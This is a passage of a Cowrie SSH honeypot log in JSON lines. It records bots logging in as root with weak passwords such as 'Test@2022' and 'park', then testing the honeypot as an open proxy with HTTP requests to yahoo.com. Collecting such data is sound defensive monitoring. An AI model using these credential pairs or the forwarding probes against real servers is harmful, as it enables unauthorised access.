-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.314686Z","src_ip":"213.209.150.239","session":"15c15defb36b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.597442Z","src_ip":"213.209.150.239","session":"15c15defb36b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":7336,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7336","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.655106Z","session":"15c15defb36b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.712155Z","src_ip":"213.209.150.239","session":"15c15defb36b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.862208Z","src_ip":"27.112.78.170","session":"1a7b663649e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":29790,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29790","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.866891Z","session":"15c15defb36b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.923576Z","src_ip":"213.209.150.239","session":"15c15defb36b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:50.981405Z","src_ip":"213.209.150.239","session":"15c15defb36b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28787,"dst_ip":"1.2.3.4","dst_port":22,"session":"880608b05a70","protocol":"ssh","message":"New connection: 213.209.150.239:28787 (1.2.3.4:22) [session: 880608b05a70]","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.037087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.038263Z","src_ip":"213.209.150.239","session":"880608b05a70"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.095214Z","src_ip":"213.209.150.239","session":"880608b05a70"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.377918Z","src_ip":"213.209.150.239","session":"880608b05a70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":9310,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9310","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.435888Z","session":"880608b05a70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.493323Z","src_ip":"213.209.150.239","session":"880608b05a70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18473,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18473","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.647154Z","session":"880608b05a70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.703919Z","src_ip":"213.209.150.239","session":"880608b05a70"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.761447Z","src_ip":"213.209.150.239","session":"880608b05a70"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28842,"dst_ip":"1.2.3.4","dst_port":22,"session":"ded63199b342","protocol":"ssh","message":"New connection: 213.209.150.239:28842 (1.2.3.4:22) [session: ded63199b342]","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.816855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.817503Z","src_ip":"213.209.150.239","session":"ded63199b342"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:51.874202Z","src_ip":"213.209.150.239","session":"ded63199b342"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.123706Z","src_ip":"27.112.78.170","session":"1a7b663649e3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.155711Z","src_ip":"213.209.150.239","session":"ded63199b342"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":17666,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:17666","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.213077Z","session":"ded63199b342"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.269981Z","src_ip":"213.209.150.239","session":"ded63199b342"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":35934,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cefaa9f38b9","protocol":"ssh","message":"New connection: 27.112.78.170:35934 (1.2.3.4:22) [session: 3cefaa9f38b9]","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.382015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.383152Z","src_ip":"27.112.78.170","session":"3cefaa9f38b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9626,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9626","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.426961Z","session":"ded63199b342"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.484211Z","src_ip":"213.209.150.239","session":"ded63199b342"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.541936Z","src_ip":"213.209.150.239","session":"ded63199b342"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28884,"dst_ip":"1.2.3.4","dst_port":22,"session":"26e415665df3","protocol":"ssh","message":"New connection: 213.209.150.239:28884 (1.2.3.4:22) [session: 26e415665df3]","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.588252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.588953Z","src_ip":"213.209.150.239","session":"26e415665df3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.636459Z","src_ip":"213.209.150.239","session":"26e415665df3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.642005Z","src_ip":"27.112.78.170","session":"3cefaa9f38b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.871044Z","src_ip":"213.209.150.239","session":"26e415665df3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16413,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16413","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.919320Z","session":"26e415665df3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:52.966463Z","src_ip":"213.209.150.239","session":"26e415665df3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24999,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24999","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.101880Z","session":"26e415665df3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.149154Z","src_ip":"213.209.150.239","session":"26e415665df3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.197507Z","src_ip":"213.209.150.239","session":"26e415665df3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28929,"dst_ip":"1.2.3.4","dst_port":22,"session":"d18fa64b889f","protocol":"ssh","message":"New connection: 213.209.150.239:28929 (1.2.3.4:22) [session: d18fa64b889f]","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.243654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.244613Z","src_ip":"213.209.150.239","session":"d18fa64b889f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.291713Z","src_ip":"213.209.150.239","session":"d18fa64b889f"}
{"eventid":"cowrie.login.success","username":"root","password":"park","message":"login attempt [root/park] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.464519Z","src_ip":"212.227.235.229","session":"24a95c97d52a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:03:53.510693Z","src_ip":"212.227.235.229","session":"24a95c97d52a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.560231Z","src_ip":"213.209.150.239","session":"d18fa64b889f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":21101,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21101","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.608323Z","session":"d18fa64b889f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.655452Z","src_ip":"213.209.150.239","session":"d18fa64b889f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.719766Z","src_ip":"27.112.78.170","session":"3cefaa9f38b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24604,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24604","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.793522Z","session":"d18fa64b889f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.840893Z","src_ip":"213.209.150.239","session":"d18fa64b889f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.888985Z","src_ip":"213.209.150.239","session":"d18fa64b889f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28979,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc9c6befb5b3","protocol":"ssh","message":"New connection: 213.209.150.239:28979 (1.2.3.4:22) [session: bc9c6befb5b3]","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.944719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.945604Z","src_ip":"213.209.150.239","session":"bc9c6befb5b3"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.979005Z","src_ip":"27.112.78.170","session":"277455d3f003"}
